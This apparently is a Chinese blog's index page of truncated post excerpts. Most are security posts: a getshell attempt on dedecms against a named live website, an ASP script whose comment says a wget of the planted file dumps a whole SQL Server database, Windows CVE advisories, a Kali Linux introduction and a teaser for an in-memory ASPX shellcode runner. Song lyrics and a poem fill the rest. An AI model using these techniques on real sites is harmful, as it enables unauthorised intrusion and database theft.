目标：www. masaike.com 目标使用程序：dedecms 版本：20120621 依稀记得2012这个版本爆出过 download.php文件的getshell漏洞，果断上手试试： 显示404，getshell失败，不知道是被拦截了还是漏洞补丁过。 继续在网上搜了下这个版本的织梦漏洞，发现了几个上传漏洞，但是需要注册账号。 注册…继续阅读 »

因为我在百度上看见的类似文章都太复杂 不适合新手看 下面的是比较简单的参数和应用 没有太设置一些详细参数 比较适合新手看 想研究详细的可以去看MSDN   bool b = true; Socket clientSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); IPAddress ip = IPAddress.Parse("192.168.1.100");   …继续阅读 »

因为我在百度上看见的类似文章都太复杂 不适合新手看 下面的是比较简单的参数和应用 没有太设置一些详细参数 比较适合新手看 想研究详细的可以去看MSDN /// <summary> /// 启动方法 /// </summary> /// <returns></returns> public void start(){ //关闭线程监视 这句话防止多线程调用出错挺好…继续阅读 »

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001" '这里改编码方式%> <% '用法：如果把本程序放在http://www.xxx.com/sql.asp，可以wget http://www.xxx.com/sql.asp -O x.csv 来直接拖库，这是marcos写的脚本 Response.Buffer = True Server.ScriptTimeout = 2147483647 str="Driver={Sql Server};Server=192.168.1.5;Uid=mssql库名;Pwd=mssql密码;Database=库名" '这…继续阅读 »

MSDN:   发布日期：2015-09-08 更新日期：2015-09-09 受影响系统： Microsoft Windows Server 2012 R2 Microsoft Windows RT Gold Microsoft Windows RT 8.1 Microsoft Windows 8.1 Microsoft Windows 10 描述： BUGTRAQ  ID: 76599 CVE(CAN) ID: CVE-2015-2527 Windows是一款由美国微软公司开发的窗口化操作系统。 Microsoft Windows某些版…继续阅读 »

多少恋情回想起，只剩结局和起头，喝一口温柔，却跌进灭顶的狂流，爱从不逗留，只由人堕落或是承受。     —————————————————————————— 播放地址 请单击 [sc_embed_player fileurl="http://www.7kb.org/music/abl.mp3"] —————————————————————…继续阅读 »

明月妆台纤纤指，年华偶然谁弹碎，应是佳人春梦里，忆不起，双蛾眉。 翩跹霓裳烟波上，几时共饮长江水，而今夜雨十年灯，我犹在，顾念谁。   一番番青春未尽游丝逸思悄悄木叶缤纷霜雪催嗟呀呀昨日云髻青牡丹独默默桃花又红人不归你说相思赋予谁 ———————————————————…继续阅读 »

Kali Linux 前身是 BackTrack（基于ubuntu），是一个基于 Debian 的 Linux 发行版，包含很多安全和取证方面的相关工具。支持 ARM架构。 Kali Linux是基于Debian的Linux发行版， 设计用于数字取证和渗透测试 和 黑客攻防。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来…继续阅读 »

ATM 字体驱动程序中的漏洞可能允许特权提升   CVE ID:CVE-2015-2387 CNCVE ID：CNCVE-20152387 漏洞发布时间:2015-07-14 漏洞更新时间:2015-07-14 影响系统 Microsoft Windows Server 2003 SP2 Microsoft Windows Server 2003 R2 SP2 Microsoft Windows Vista SP2 Microsoft Windows Server 2008 SP2 SP1 Microsoft Windows 7 SP1 Microsoft Windows 8 and Windows…继续阅读 »

看见土司有一帖子 具体看下面连接 https://www.t00ls.net/thread-26444-1-2.html   这是php的   其实IIS也有类似的 这是MSF生成的一个ASPX执行shellcode的代码 执行后即使删掉文件 程序依然还在内存里 而且是以提供web服务的程序权限执行的     7kb.org 原创,如有转载请注明出处 www.…继续阅读 »